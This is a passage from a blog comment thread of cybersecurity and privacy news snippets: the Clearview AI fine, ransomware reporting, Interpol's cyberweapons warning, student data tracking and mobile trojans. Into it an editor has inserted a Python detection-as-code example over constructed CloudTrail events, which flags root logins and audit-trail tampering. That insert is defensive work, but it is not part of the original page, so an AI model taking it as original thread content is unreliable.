
    The UK Information Commissioner’s Office (ICO) has fined facial recognition database firm Clearview AI more than £7.5 million (around $9.4 million) for breaching the UK GDPR. The ICO has also ordered Clearview to stop scraping and using the personal data of UK residents, and to delete the data of UK residents from its systems.

    Clearview has scraped more than 20 billion images of faces and data available on the internet. Its service then allows customers – including the police – to upload an image to the Clearview app which matches it to images in the database. Close matches and a link to the source of the matches are returned to the customer.

    Clearview no longer offers its services in the UK. However, the ICO believes its database will inevitably include images of UK residents, and these details are made available to users outside of the UK.

    Announcing the fine and enforcement notice, John Edwards, UK Information Commissioner, said, “Clearview AI Inc has collected multiple images of people all over the world, including in the UK, from a variety of websites and social media platforms, creating a database with more than 20 billion images. The company not only enables identification of those people, but effectively monitors their behavior and offers it as a commercial service. That is unacceptable. That is why we have acted to protect people in the UK by both fining the company and issuing an enforcement notice.”

    Reply
  27. Tomi Engdahl says:

    AWS Security Logging Best Practices: Real-Time Alerts and Detection-as-Code
    https://panther.com/resources/webinars/aws-security-logging-best-practices-real-time-alerts-and-detection-as-code/?utm_source=security+week&utm_medium=sponsored&utm_content=webinar

    For organizations tasked with securing rapidly growing AWS environments, one of the most challenging issues faced is collecting and normalizing AWS infrastructure logs like CloudTrail and VPC to identify suspicious activity. There’s a wealth of security-relevant information in these logs, but AWS logs are “noisy” and often voluminous, and teams need a robust security architecture to process this data that optimizes for speed, scale, and flexibility.

    With Panther, disparate security logs from multiple AWS accounts and services can be collected and normalized in a single view for easier and faster threat detection and investigation. Panther’s data pipeline is built on the idea of “Streaming ETL (Extract, Transform, and Load)” where security data is parsed, normalized, and analyzed in real-time to identify suspicious activity as soon as it happens.

    Two former AWS and Amazon engineers, Russell Leighton and Kostas Papageorgiou, discuss AWS security logging best practices with former Gartner analyst Brad LaPorte, along with how to:

    Centralize AWS logs for threat detection and investigation
    Transform high-volume AWS data into a structured and scalable security data lake
    Achieve real-time alerts with detection-as-code
    Triage alerts faster by correlating activity across your AWS environment

    Reply
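    The comment above describes the streaming pipeline pattern (collect raw CloudTrail events, normalize them, then evaluate detection rules written as code and correlate across the environment). The following is an added illustration of that pattern, not code from the original page or from Panther: it normalizes a handful of constructed CloudTrail-shaped events, runs three rules over them (root console login, console login without MFA, and CloudTrail tampering via StopLogging/DeleteTrail/UpdateTrail/PutEventSelectors) and builds per-source-IP context for triage. The sample events, the rule names and the field selection are assumptions for the example; the event and API names themselves are real CloudTrail values.

```python
"""Detection-as-code over CloudTrail-style events (added example with constructed data)."""
import json
from typing import Callable, Dict, Iterable, List

# Constructed sample events in CloudTrail's JSON shape. The account id, ARNs and
# IP addresses are documentation/placeholder values, not real log data.
SAMPLE_EVENTS = [
    json.dumps({"eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com",
                "userIdentity": {"type": "Root", "arn": "arn:aws:iam::111111111111:root"},
                "sourceIPAddress": "198.51.100.7",
                "responseElements": {"ConsoleLogin": "Success"},
                "additionalEventData": {"MFAUsed": "No"}}),
    json.dumps({"eventName": "StopLogging", "eventSource": "cloudtrail.amazonaws.com",
                "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/ops"},
                "sourceIPAddress": "203.0.113.9",
                "requestParameters": {"name": "org-trail"}}),
    json.dumps({"eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
                "userIdentity": {"type": "AssumedRole",
                                 "arn": "arn:aws:sts::111111111111:assumed-role/ReadOnly/bob"},
                "sourceIPAddress": "203.0.113.9"}),
    json.dumps({"eventName": "ConsoleLogin", "eventSource": "signin.amazonaws.com",
                "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/alice"},
                "sourceIPAddress": "192.0.2.5",
                "responseElements": {"ConsoleLogin": "Success"},
                "additionalEventData": {"MFAUsed": "Yes"}}),
]


def normalize(raw_line: str) -> Dict:
    """The 'transform' step: flatten one raw CloudTrail JSON line into a fixed schema."""
    ev = json.loads(raw_line)
    ident = ev.get("userIdentity") or {}
    return {
        "event_name": ev.get("eventName", ""),
        "event_source": ev.get("eventSource", ""),
        "principal_type": ident.get("type", ""),
        "principal": ident.get("arn", ""),
        "source_ip": ev.get("sourceIPAddress", ""),
        # responseElements / additionalEventData are null on many event types, hence "or {}"
        "login_result": (ev.get("responseElements") or {}).get("ConsoleLogin", ""),
        "mfa_used": (ev.get("additionalEventData") or {}).get("MFAUsed", ""),
    }


# Each rule is a plain function over the normalized record: version it, review it, test it.
Rule = Callable[[Dict], bool]


def root_console_login(rec: Dict) -> bool:
    """Interactive use of the account root user, which should be reserved for break-glass."""
    return rec["event_name"] == "ConsoleLogin" and rec["principal_type"] == "Root"


def console_login_without_mfa(rec: Dict) -> bool:
    """Successful console sign-in where CloudTrail reports no MFA."""
    return (rec["event_name"] == "ConsoleLogin"
            and rec["login_result"] == "Success"
            and rec["mfa_used"] == "No")


def cloudtrail_tampering(rec: Dict) -> bool:
    """API calls that stop, delete or reconfigure a trail, i.e. blind the audit log."""
    return (rec["event_source"] == "cloudtrail.amazonaws.com"
            and rec["event_name"] in {"StopLogging", "DeleteTrail",
                                      "UpdateTrail", "PutEventSelectors"})


RULES: Dict[str, Rule] = {
    "root_console_login": root_console_login,
    "console_login_without_mfa": console_login_without_mfa,
    "cloudtrail_tampering": cloudtrail_tampering,
}


def run_detections(lines: Iterable[str]) -> List[Dict]:
    """Evaluate every rule against every event as it streams in; return alerts in order."""
    alerts: List[Dict] = []
    for line in lines:
        try:
            rec = normalize(line)
        except (json.JSONDecodeError, AttributeError):
            continue  # one malformed record must not stall the pipeline
        for rule_id, rule in RULES.items():
            if rule(rec):
                alerts.append({"rule": rule_id, "principal": rec["principal"],
                               "source_ip": rec["source_ip"], "event": rec["event_name"]})
    return alerts


def triage_context(lines: Iterable[str]) -> Dict[str, List[str]]:
    """For each source IP that raised an alert, list every API call seen from it."""
    lines = list(lines)
    calls_by_ip: Dict[str, set] = {}
    for line in lines:
        try:
            rec = normalize(line)
        except (json.JSONDecodeError, AttributeError):
            continue
        calls_by_ip.setdefault(rec["source_ip"], set()).add(rec["event_name"])
    alerted_ips = {a["source_ip"] for a in run_detections(lines)}
    return {ip: sorted(calls_by_ip[ip]) for ip in alerted_ips}


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
    print(triage_context(SAMPLE_EVENTS))
```

    On the constructed input the root login raises two alerts (root use and missing MFA), the StopLogging call raises one, and the read-only DescribeInstances call raises none but still shows up in the triage context for its source IP, which is the kind of correlation the webinar blurb refers to.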
  28. Tomi Engdahl says:

    US Senate: Govt’s ransomware fight hindered by limited reporting https://www.bleepingcomputer.com/news/security/us-senate-govt-s-ransomware-fight-hindered-by-limited-reporting/
    A report published today by U.S. Senator Gary Peters, Chairman of the Senate Homeland Security and Governmental Affairs Committee, says law enforcement and regulatory agencies lack insight into ransomware attacks to fight against them effectively. While ransomware incidents have been increasingly hitting organizations across the country, there’s still room to improve reporting of both attacks and ransom payments which would provide the federal government with the data and information it needs to deter this severe threat to national security, Senator Peters added.

    Reply
  29. Tomi Engdahl says:

    Interpol chief predicts a new threat online: “Within a couple of years…” https://www.is.fi/digitoday/tietoturva/art-2000008841358.html

    Reply
  30. Tomi Engdahl says:

    Interpol chief predicts a new threat online: “Within a couple of years…” https://www.is.fi/digitoday/tietoturva/art-2000008841358.html
    Just like conventional weapons, cyberweapons can end up in the wrong hands.
    Interpol Secretary General Jürgen Stock warns that state cyberweapons will end up being distributed on the dark web “within a couple of years”. This would also mean them falling into the hands of cybercriminals and being put to use, NBC writes.
    Military-Made Cyberweapons Could Soon Become Available on the Dark Web, Interpol Warns
    https://www.nbcwashington.com/news/business/money-report/military-made-cyberweapons-could-soon-become-available-on-the-dark-web-interpol-warns/3059122/
    Interpol Secretary General Jurgen Stock said he’s concerned state-developed cyberweapons will become available on the darknet in a “couple of years.”
    The topic of cyberwar has long been a concern for global governments, but it’s gotten renewed attention amid the Russia-Ukraine war.
    The number of cyberattacks more than doubled globally in 2021, according to the World Economic Forum’s Global Cybersecurity Outlook report.

    Reply
  31. Tomi Engdahl says:

    8 different kinds of cyberattack – this is how Finland could be attacked
    The full spectrum of cyberattacks has been on display in Ukraine.
    https://www.is.fi/digitoday/tietoturva/art-2000008819316.html

    Reply
  32. Tomi Engdahl says:

    Two Cybersecurity Companies Offering Free Risk Assessments
    https://www.securityweek.com/two-cybersecurity-companies-offering-free-risk-assessments

    Endpoint security company Tanium and risk management solutions provider Reciprocity have each announced free risk assessment offerings this week.

    Tanium is offering what it describes as a comprehensive five-day risk assessment that leverages the company’s platform, a cloud-based delivery model, and Python-based script automation.

    A risk score is calculated based on data collected about system vulnerabilities, administrative access, compliance, sensitive data identification, encryption and authentication, the risk of lateral movement, and insecure transport security protocols.

    Companies that conduct the risk assessment are provided a comprehensive report that includes recommendations on remediation and implementation.

    Tanium says CISOs and CIOs can use the assessment to better communicate with business leaders and the board when it comes to risk posture and the steps being taken to improve it.

    Reciprocity announced a new community edition of its automated risk observation, assessment, and remediation (ROAR) platform.

    Reciprocity Community Edition is a free version of the company’s ROAR platform that includes the ZenComply compliance and audit management solution and the ZenRisk risk management solution.

    The platform is fully functional, but it does have limitations — it’s only designed to help organizations achieve SOC 2 compliance.

    https://reciprocity.com/community-edition-signup/

    Reply
  33. Tomi Engdahl says:

    WhiteSource Becomes Mend, Adds Automatic Code Remediation
    https://www.securityweek.com/whitesource-becomes-mend-adds-automatic-code-remediation

    An application code security firm has expanded its repertoire and changed its name to better reflect its new capabilities. WhiteSource has become Mend with the addition of automated code remediation to the newly named Mend Application Security Platform.

    WhiteSource, now known as Mend, has been best known for its work on securing the open source software (OSS) supply chain. In February 2022 it reported that it had found 1,300 malicious JavaScript packages in the npm registry. In recent months it has developed a static application security testing (SAST) capability to complement its existing software composition analysis (SCA) open source functionality. It can now check in-house developed code as well as imported OSS.

    The remediation works by scanning the code for common weaknesses (the CWE is a list of software weakness types, the presence of which could lead to a vulnerability in the code). “We look at the code after it’s been committed,” explained Sass. “If we find a vulnerability, we can open what’s called a pull request for the developer with a suggested fix. The few lines of code that we synthetically generate to fix the vulnerability for the developer would appear as a pull request for the developer waiting for his review inside the repository.”

    Reply
  34. Tomi Engdahl says:

    Tapping Neurodiverse Candidates Can Address Cybersecurity Skills Shortage
    https://www.securityweek.com/tapping-neurodiverse-candidates-can-address-cybersecurity-skills-shortage

    While neurodiverse candidates don’t fit the traditional mold of applicants, they can often excel at highly focused, analytical work

    At a time when there are countless unfilled cybersecurity positions worldwide, too many companies overlook neurodiverse candidates in their hiring processes. This is a huge mistake, as people with autism, dyslexia, and other conditions often possess skills that are well suited for cybersecurity work. Those skills include the ability to concentrate, a capacity for recognizing anomalies, and great determination.

    People with ADHD, for example, are able to hyper-focus on certain tasks, while those with autism can process complex detail-oriented tasks, and have above average recall capabilities.

    However, neurodiverse people generally do not excel at acquiring certifications — common requirements for most cybersecurity jobs. Presenting a polished persona in an interview is something else they may struggle with.

    In addition, interviewing neurodiverse candidates can be challenging since they tend to avoid eye contact, sometimes struggle to communicate and can get overwhelmed in unfamiliar circumstances. They may also struggle to communicate with groups of people in a panel-type interview. All of these are typically seen as having “interviewed badly.”

    If the cybersecurity industry wants to fill much-needed jobs, hiring managers and recruiters need to cast their nets beyond the sea of candidates who typify “fitting the mold.” The industry must pay attention to the hands-on abilities and innate skills of all applicants including neurodiverse candidates.

    Reply
  35. Tomi Engdahl says:

    Drew Harwell / Washington Post:
    Human Rights Watch finds 89% of 164 remote learning apps and sites used during the pandemic in 49 countries shared student data with marketers and data brokers — The educational tools used by students during the pandemic shared their information with advertisers and data brokers that could track …
    https://www.washingtonpost.com/technology/2022/05/24/remote-school-app-tracking-privacy/

    Reply
  36. Tomi Engdahl says:

    10 of the Most In-Demand IT Jobs — and Why
    https://www.skillsoft.com/blog/10-of-the-most-in-demand-it-jobs-and-why?utm_source=security+week&utm_medium=display&utm_campaign=SKL+IT-SW-NA+FY23-ALL-PM-BLG-10+Most+in+demand+IT+jobs&utm_content=SKSTDMostDemandedJobs

    While demand for skilled talent isn’t a new issue in IT, due to the Great Resignation competition has intensified for roles in cybersecurity, cloud, data science, and other areas.

    It’s left tech leaders struggling to hire the workers they need. Nearly 40% of IT decision-makers have three or more unfilled roles on their teams.

    “Conventional IT companies are no longer the only ones looking for IT workers, as more companies look to drive efficiency and scale to their business,” said Nev Ross, VP of Software Engineering at Skillsoft. “This has added an additional challenge to filling IT roles, which can delay project deliverables, affect company growth and customer satisfaction. Having open roles can be very costly to an organization in many ways.”

    While competition for skilled workers remains high, another challenge continues to worsen at the same time: skills gaps. While most IT teams have skills gaps, what’s really staggering is how they impact the organization.

    According to a joint IDG-Skillsoft survey, 89% of IT leaders see losses in revenue due to skills shortages, 76% see business go to the competition, and 72% see declines in customer satisfaction.

    The 10 Most Challenging Areas of Tech to Hire For, According to IT Leaders

    In a survey of more than 9,300 IT professionals worldwide, we reported in our IT Skills and Salary Report that the top 10 most challenging areas to hire for are these:

    Cybersecurity
    Cloud Computing
    Analytics and Big Data
    AI and Machine Learning
    Systems and Solutions Architects
    DevOps
    Leadership and Management
    Networking and Wireless
    Data Policy and Governance
    Project Management

    For the past several years, cybersecurity has risen to the top of the list. Roles in this area remain among the most highly coveted and for good reason. According to IBM’s annual report on the topic, the average cost of a data breach is the highest it’s ever been at $4.24 million. Organizations continue to prioritize these roles because of the critical nature of security.

    But, again, talent scarcity challenges IT leaders with team vacancies. Cyber Seek, an initiative to gather data on the cybersecurity job market, shows there are 597,000 open cybersecurity jobs in the U.S.

    Reply
  37. Tomi Engdahl says:

    Security for the Atomized Network
    A White Paper
    https://content.netography.com/atomized-network-security-white-paper?utm_source=SecurityWeek&utm_medium=Banner&utm_campaign=AtomizedNetworkWhitePaper

    We are facing an entirely different model of networking and computing, where applications and data are scattered across a complex environment consisting of multi-cloud, on-premise, and legacy infrastructure, being accessed by increasingly mobile and remote workers.

    We call this the Atomized Network and it is increasingly difficult to secure.

    In this white paper, we closely examine the Atomized Network, why it is difficult to defend, the limitations of the most prevalent solutions, and the new paradigm needed to secure it.

    Reply
  38. Tomi Engdahl says:

    Washington Post:
    Young gunmen are using private and disappearing messages in apps like Snapchat, Instagram, Discord, and Yubo to share violent plans, evading content moderation

    https://www.washingtonpost.com/technology/2022/05/26/shooters-social-media/

    Reply
  39. Tomi Engdahl says:

    Charlotte Klein / Vanity Fair:
    Some US journalists question whether showing more graphic footage would force the public and political leaders to fully confront America’s gun violence epidemic

    “We Cannot Sanitize These Killings”: News Media Considers Breaking Grimly Routine Coverage of Mass Shootings
    https://www.vanityfair.com/news/2022/05/news-media-considers-breaking-grimly-routine-coverage-of-mass-shootings

    Reply
  40. Tomi Engdahl says:

    The Wild West ends: EU restricts facial recognition https://www.is.fi/digitoday/tietoturva/art-2000008842601.html
    Facial recognition is being reined in within the European Union, the Office of the Data Protection Ombudsman announces. The European Data Protection Board has issued new guidance concerning the use of facial recognition technology in the field of law enforcement.

    Reply
  41. Tomi Engdahl says:

    Four Takeaways as the European Union’s General Data Protection Regulation (GDPR) Turns 4 https://www.crowdstrike.com/blog/four-takeaways-as-gdpr-turns-4/
    May 25, 2022, marked four years since the European Union’s General Data Protection Regulation (GDPR) went into effect. Although the scope of the law is limited to personal data originating from activities in the European Economic Area, the ensuing requirements have had a global impact. This is evident in similar laws that have been proposed or passed and measures multinational organizations have taken to comply with privacy requirements. In parallel, there has been a convergence of a principles-based approach to cybersecurity in many jurisdictions worldwide. In light of the trends of the past four years, there are four clear takeaways for organizations seeking to meet their GDPR obligations.

    Reply
  42. Tomi Engdahl says:

    WhatsApp is working on a confusing change: disappearing messages can be kept after all https://www.is.fi/digitoday/mobiili/art-2000008845554.html
    WhatsApp, the instant messenger owned by META, formerly Facebook, is planning a change to disappearing messages. The service introduced self-destructing messages in 2020 to increase users’ privacy, but the feature now being planned would allow certain messages to be kept, writes WABetaInfo, which follows the app’s development.
    According to the news service, the feature lets the sender of a message keep visible a message that was originally sent as disappearing. A section named Kept Messages was found in the test version of WhatsApp’s desktop app. In the future, this is where the disappearing messages that a user has decided to keep will be found.

    Reply
  43. Tomi Engdahl says:

    Remote learning apps shared children’s data at a ‘dizzying scale’
    https://www.msn.com/en-us/news/technology/remote-learning-apps-shared-children-e2-80-99s-data-at-a-e2-80-98dizzying-scale-e2-80-99/ar-AAXGt4T
    Millions of children had their online behaviors and personal information tracked by the apps and websites they used for school during the pandemic, according to an international investigation that raises concerns about the impact remote learning had on children’s privacy online. The educational tools were recommended by school districts and offered interactive math and reading lessons to children as young as prekindergarten. But many of them also collected students’ information and shared it with marketers and data brokers, who could then build data profiles used to target the children with ads that follow them around the Web.

    Reply
  44. Tomi Engdahl says:

    Mobile trojan detections rise as malware distribution level declines https://www.bleepingcomputer.com/news/security/mobile-trojan-detections-rise-as-malware-distribution-level-declines/
    Kaspersky’s quarterly report on mobile malware distribution notes a downward trend that started in late 2020. Despite the overall demise in malware volumes, the security company reports a spike in trojan distribution, including generic trojans, banking trojans, and spyware.
    This worrying development underlines an increasing focus on more sophisticated and damaging operations that gradually replace the low-yielding adware and “risk-tools”.

    Reply